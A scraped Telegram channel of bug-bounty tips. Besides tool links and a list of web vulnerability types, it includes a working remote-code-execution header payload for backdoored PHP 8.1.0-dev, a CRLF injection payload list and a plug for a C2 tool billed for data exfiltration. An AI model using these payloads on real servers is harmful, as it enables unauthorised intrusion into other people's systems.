Brut Security
@brutsecurity
15.1K subscribers
965 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
About
Blog
Apps
Platform
Join
Brut Security
15.1K subscribers
Brut Security
๐Ÿ“ŒTargeted Scanning with Burp Suite: A Regex Pattern for example.com

โ“As a penetration tester or bug bounty hunter, it's essential to focus your scanning efforts on the specific domains and subdomains that matter. In this post, we'll explore a regex pattern that helps you target the example.com domain and its subdomains in Burp Suite, and how to combine it with powerful tools to get more fine-grained results.

๐Ÿ’ตThe Regex Pattern:
(^|^[^:]+:\/\/|[^\.]+\.)example.*



๐Ÿ›Let's break down this pattern:

(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.

([^\.]+\.): Matches the subdomain (if any) before the main domain example.

example: The main domain name, replaced with example in this example.

.*: Matches any characters (including none) after the main domain name.


๐Ÿ›This pattern will match any URLs that contain the domain example and may include:

Protocols like http:// or https://

Subdomains like sub.example or foo.bar.example

Paths and query strings like /path/to/resource?param=value


โ—๏ธUsing this Pattern in Burp Suite:

โœ”๏ธAdd this regex pattern to the "Add Scope" section in Burp Suite to specify the scope of URLs that Burp should target. This will help Burp focus on the specific domain and its subdomains, and ignore other unrelated URLs.

โ—๏ธCombining with Powerful Tools:

โœ”๏ธTo get more fine-grained results, combine this regex pattern with the following tools in Burp Suite:

1.Burp JS Link Finder: Finds JavaScript files and links on the target website.

2.Paraminer: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.

3.Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.

4.Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.

5.SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.



โšก๏ธBy using this regex pattern and combining it with these powerful tools, you can perform a more targeted and efficient vulnerability scan on the example.com domain and its subdomains.

โ˜„๏ธHappy Hunting!โ˜„๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘6๐Ÿ‘2
3.21K viewsSaumadip Mandal, edited  
Brut Security
Find a server running PHP 8.1.0-dev โ“
๐Ÿšจ Check for easy RCE ๐Ÿšจ

๐Ÿ‘‡ Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbountytips #bugbounty
๐Ÿ‘8๐Ÿฅฐ2
2.76K viewsSaumadip Mandal
Brut Security
Brut Security
โ˜„๏ธWill Drop A New BB Platform If We Reach 4K by Upcoming Weekโ˜„๏ธ
๐Ÿ“ŒAs Promised Here is The New BB Platform https://www.trustline.sa/
Please open Telegram to view this post
VIEW IN TELEGRAM
Trustline
TrustLine | The world's premier vulnerability discovery platform in the field of information security and a bug bounty program
TrustLine is a cybersecurity platform that provides advanced services such as vulnerability bounties, penetration testing, and vulnerability disclosure policy p
๐Ÿ‘5โค2๐Ÿค”1๐Ÿ˜1
2.61K viewsSaumadip Mandal
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
ใŠ™Lemma - run all your commandline tools as serverless functions with response streams. Scale and connect remote tools with local tools via linux pipes. Run all your remote tools from a built-in Web-CLI in your browser.

๐Ÿ”–Download - https://github.com/defparam/lemma

#bugbounty #bugbountytips #cybersecurity #ethicalhacking
2.7K viewsSaumadip Mandal
Brut Security
ใŠ™TelecordC2 - Advanced Telegram & Discord C2, great for data Exfiltration and Network evasion. This project is built to enhance red teaming operations.

โœ…Download - https://github.com/ELMERIKH/TelecordC2

#bugbounty #ethicalhacking #redteam #redteamtips
โค2
2.79K viewsSaumadip Mandal
Brut Security
100 web vulnerabilities, categorized into various types:

Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

Server-Side Request Forgery (SSRF):
87. Blind SSRF
88. Time-Based Blind SSRF

Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
๐Ÿ‘15โค3
3.21K viewsSaumadip Mandal
Brut Security
Bug Bounty Tip

CRLF Injection Attack Payload List

๐Ÿ”น /%%0a0aSet-Cookie:crlf
๐Ÿ”น /%0aSet-Cookie:crlf
๐Ÿ”น /%0d%0aSet-Cookie:crlf
๐Ÿ”น /%0dSet-Cookie:crlf
๐Ÿ”น /%23%0aSet-Cookie:crlf
๐Ÿ”น /%23%0d%0aSet-Cookie:crlf
๐Ÿ”น /%23%0dSet-Cookie:crlf
๐Ÿ”น /%25%30%61Set-Cookie:crlf
๐Ÿ”น /%25%30aSet-Cookie:crlf
๐Ÿ”น /%250aSet-Cookie:crlf
๐Ÿ”น /%25250aSet-Cookie:crlf
๐Ÿ”น /%2e%2e%2f%0d%0aSet-Cookie:crlf
๐Ÿ”น /%2f%2e%2e%0d%0aSet-Cookie:crlf
๐Ÿ”น /%2F..%0d%0aSet-Cookie:crlf
๐Ÿ”น /%3f%0d%0aSet-Cookie:crlf
๐Ÿ”น /%3f%0dSet-Cookie:crlf
๐Ÿ”น /%u000aSet-Cookie:crlf
๐Ÿ”น /%E5%98%8D%E5%98%8ASet-Cookie:crlf

#bugbounty #cybersecurity #ethicalhacking
โค9๐Ÿ‘5
2.55K viewsSaumadip Mandal
Brut Security
https://www.youtube.com/watch?v=aFtSFuXUO9I
A very old video about restoring Windows boot loader after deleting Linux and Grub loader. Back in past many guys used to face the issue. Sorry for the intro and outro. I was kiddo that time :)
YouTube
How To Restore Windows boot loader After Deleting Linux and Grub loader| H4K-XTRA
So I'm back on youtube :D
In This Video i will be showing how to unistall linux and remove grub bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after unistalling linux the grub bootโ€ฆ
2.89K viewsSaumadip Mandal
Brut Security
XSS Cheatsheet Burpsuite Extension https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d
๐Ÿ‘3
2.91K viewsSaumadip Mandal
Brut Security
How to fix the Crowdstrike thing:

1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
2.8K viewsSaumadip Mandal
Brut Security
๐Ÿ‘‰ InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.

๐Ÿ”—Download : https://github.com/Infisical/infisical
๐Ÿ‘7โค1๐Ÿ”ฅ1
2.93K viewsSaumadip Mandal
Brut Security
๐Ÿ“ฎJScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.

โœ…Download- https://github.com/ifconfig-me/JScripter

#BugBounty #bugbountytips
๐Ÿ”ฅ8๐Ÿ‘1
2.81K viewsSaumadip Mandal
Brut Security
๐Ÿš€ Apepe - Mobile application pentesting๐Ÿš€

๐Ÿ•ต๏ธ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...

๐Ÿงพ Source - github.com/oppsec/Apepe
โค7
2.69K viewsSaumadip Mandal
Brut Security
Do Sign Up for Top Notch Results ๐Ÿ˜Ž
Please open Telegram to view this post
VIEW IN TELEGRAM
2.45K viewsSaumadip Mandal
Brut Security
๐Ÿคฃ15๐Ÿ˜3โค2๐Ÿคฏ1
2.4K viewsSaumadip Mandal
Brut Security
Best App For Sql Injection
Link - https://github.com/darknethaxor/DH-HackBar
๐Ÿ‘4๐Ÿ†’3
2.54K viewsSaumadip Mandal, edited  
Brut Security
๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ๐Ÿคฏ
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ5๐Ÿ˜2๐Ÿ™1
2.32K viewsSaumadip Mandal, edited  
Brut Security
๐Ÿคฃ9
2.27K viewsSaumadip Mandal
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

๐Ÿ˜š https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘2๐Ÿ‘1
2.45K viewsSaumadip Mandal, edited  
Brut Security
๐Ÿ‘3
2.49K viewsSaumadip Mandal
Brut Security
TryHackMe_Free_Lab.pdf
407.6 KB
2.41K viewsSaumadip Mandal